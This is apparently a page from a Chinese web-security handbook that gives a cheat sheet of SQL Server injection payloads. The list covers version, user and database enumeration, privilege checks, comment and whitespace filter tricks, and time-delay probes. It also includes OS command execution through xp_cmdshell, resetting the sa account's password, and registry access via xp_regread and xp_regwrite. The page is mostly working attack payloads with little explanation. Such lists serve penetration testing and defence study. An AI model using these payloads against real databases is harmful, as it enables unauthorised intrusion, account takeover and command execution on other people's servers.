4.1.7.1. SQL Server Payload

发布于 2024-02-07 20:47:53 字数 3907 浏览 0 评论 0 收藏 0

4.1.7.1.1. 常见Payload

Version
- SELECT @@version
- SELECT SERVERPROPERTY('Edition');
- SELECT SERVERPROPERTY('EngineEdition');
Comment
- SELECT 1 -- comment
- SELECT /*comment*/1
Space
- 0x01 - 0x20
用户信息
- SELECT user_name()
- SELECT system_user
- SELECT user
- SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
用户权限
- select IS_SRVROLEMEMBER('sysadmin')
- select IS_SRVROLEMEMBER('db_owner')
List User
- SELECT name FROM master..syslogins
数据库信息
- SELECT name FROM master..sysdatabases
- select concat_ws(table_schema,table_name,column_name) from information_schema.columns
- select quotename(name) from master..sysdatabases FOR XML PATH('')
执行命令
- EXEC xp_cmdshell 'net user'
Ascii
- SELECT char(0x41)
- SELECT ascii('A')
- SELECT char(65)+char(66) => return AB
Delay
- WAITFOR DELAY '0:0:3' pause for 3 seconds
Change Password
- ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'
Trick
- id=1 union:select password from:user
文件读取
- OpenRowset
当前查询语句
- select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle)
hostname
- 用于判断是否站库分离
- select host_name()
- exec xp_getnetname
服务器信息
- exec xp_msver
系统配置
- select * from sys.configurations;

xp_regread
- exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\CurrentControlSet\Services\MSSEARCH'
xp_regwrite
xp_regdeletvalue
xp_regdeletkey
xp_regaddmultistring